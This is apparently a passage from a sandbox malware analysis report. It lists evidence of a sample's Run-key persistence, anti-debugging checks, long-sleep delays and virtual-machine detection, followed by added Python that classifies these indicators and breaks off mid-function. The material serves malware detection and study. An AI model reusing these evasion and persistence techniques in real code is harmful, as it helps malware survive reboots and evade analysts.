              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D64D26 push eax; ret 6_2_09D64D2E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D65125 push eax; ret 6_2_09D65126
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_09D600D3 push esp; ret 6_2_09D600E2

              Boot Survival

              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Argumentlistens
              Source: C:\Windows\SysWOW64\clip.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LZ0PTDW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 17_2_004047CB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A6D1C0 rdtsc
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_3_226529F0 sldt word ptr [eax]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5307
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4573
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6848
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2862
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 3096
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 442
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 5568
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: foregroundWindowGot 1709
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6071
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6809
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2590
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 717
Source: C:\Program Files (x86)\Windows Mail\wab.exe | API coverage: 9.6 %
Source: C:\Program Files (x86)\Windows Mail\wab.exe | API coverage: 0.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4184 | Thread sleep count: 6848 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832 | Thread sleep count: 2862 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1280 | Thread sleep count: 3096 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2616 | Thread sleep count: 442 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2616 | Thread sleep time: -1326000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2616 | Thread sleep count: 5568 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2616 | Thread sleep time: -16704000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1016 | Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1512 | Thread sleep count: 6809 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5984 | Thread sleep count: 2590 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3908 | Thread sleep count: 717 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Windows\SysWOW64\clip.exe | Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread sleep count: Count: 3096 delay: -5
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB6580 FindFirstFileExA
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00418981 memset,GetSystemInfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: wscript.exe, 00000013.00000003.2548910255.000000000352E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wab.exe | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000014.00000002.3392964729.00000000076E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: powershell.exe, 00000003.00000002.2687473128.0000024A5ABB6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW3018%SystemRoot%\system32\mswsock.dll0
Source: wscript.exe, 00000013.00000003.2548231956.000000000351F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3
Source: C:\Program Files (x86)\Windows Mail\wab.exe | API call chain: ExitProcess graph end node (graph_17-34129)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort (2 identical entries)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process queried: DebugPort (3 identical entries)
Source: C:\Windows\SysWOW64\clip.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A6D1C0 rdtsc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04668528 LdrInitializeThunk
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
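The evidence lines in this evasion section are the sandbox's two-column table (source process, observation) flattened into one string per line, with the link label "Jump to behavior" and a repeated function ID glued onto many of them. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses lines of that shape back into records, strips the residue, and tags each record with the evasion technique it evidences (PEB reads through fs:[30h], rdtsc timing, sldt, DebugPort queries, IsDebuggerPresent, long or repeated sleeps, VM device strings). The sample lines are copied from this report; the technique labels, the field names, the reading of the function-ID fields as process index / snapshot index / virtual address, and the assumption that the reported delay unit is milliseconds are the example's own.

```python
"""Parse flattened Joe Sandbox evidence lines into tagged evasion indicators.

Added example, not code from the Joe Sandbox report or its tooling. Technique
labels, field names and the reading of the function-ID fields are assumptions.
"""
import re
from collections import Counter

LINK_LABEL = "Jump to behavior"   # HTML link text glued onto many lines by extraction

# Observation kinds seen in this section; the source column ends where one begins
# (the report's column boundary was lost in extraction).
EVIDENCE_KINDS = (
    "Process information set", "Process information queried", "Process queried",
    "Code function", "Thread delayed", "Thread sleep count", "Thread sleep time",
    "Window found", "Window / User API", "API coverage", "Last function",
    "File opened", "Binary or memory string", "API call chain",
)
LINE_RE = re.compile(r"^Source: (?P<source>.+?)(?P<kind>"
                     + "|".join(re.escape(k) for k in EVIDENCE_KINDS)
                     + r"): ?(?P<detail>.*)$")
TID_RE = re.compile(r"^(?P<path>.*?) TID: (?P<tid>\d+)$")
# "27_2_22A6D1C0 rdtsc 27_2_22A6D1C0": the ID is repeated at the end (link residue).
FUNC_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-Fa-f]+) (?P<body>.*?)\s*(?P=fid)$")
FUNC_FALLBACK_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-Fa-f]+) (?P<body>.*)$")
DELAY_RE = re.compile(r"delay time: (\d+)")
VM_STRING_RE = re.compile(r"VMware|Hyper-V|VBox|VirtualBox|QEMU", re.I)

# 922337203685477 == (2**63 - 1) // 10000: .NET TimeSpan.MaxValue in whole
# milliseconds, i.e. an effectively unbounded sleep (assumes the delay unit is ms).
TIMESPAN_MAX_MS = (2**63 - 1) // 10000

# Constructed sample: lines copied from this report section, residue left in place.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX",
    r"Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6D1C0 rdtsc 27_2_22A6D1C0",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_3_226529F0 sldt word ptr [eax]27_3_226529F0",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2616Thread sleep count: 5568 > 30Jump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_21CB60E2",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A862A0 mov eax, dword ptr fs:[00000030h]27_2_22A862A0",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A862A0 mov ecx, dword ptr fs:[00000030h]27_2_22A862A0",
    r"Source: wscript.exe, 00000013.00000003.2548231956.000000000351F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3",
    r"Source: wab.exeBinary or memory string: Hyper-V RAW",
]


def classify(rec):
    """Map one record to the evasion technique it evidences (labels are this example's)."""
    kind, detail = rec["kind"], rec["detail"]
    if kind == "Code function":
        if "fs:[00000030h]" in detail:
            return "peb-access"            # TEB->PEB read: BeingDebugged, NtGlobalFlag, loader lists
        if detail.startswith("rdtsc"):
            return "timing-rdtsc"
        if detail.startswith("sldt"):
            return "vm-check-sldt"
        if "IsDebuggerPresent" in detail:
            return "debugger-check"
        if "NtQuerySystemInformation" in detail:
            return "process-enumeration"
        if "FindFirstFile" in detail:
            return "file-enumeration"
        return "other-code"
    if kind == "Process queried" and detail == "DebugPort":
        return "debugger-check"            # NtQueryInformationProcess(ProcessDebugPort)
    if kind == "Window / User API" and not detail.startswith("threadDelayed"):
        return "user-activity-check"       # e.g. foregroundWindowGot
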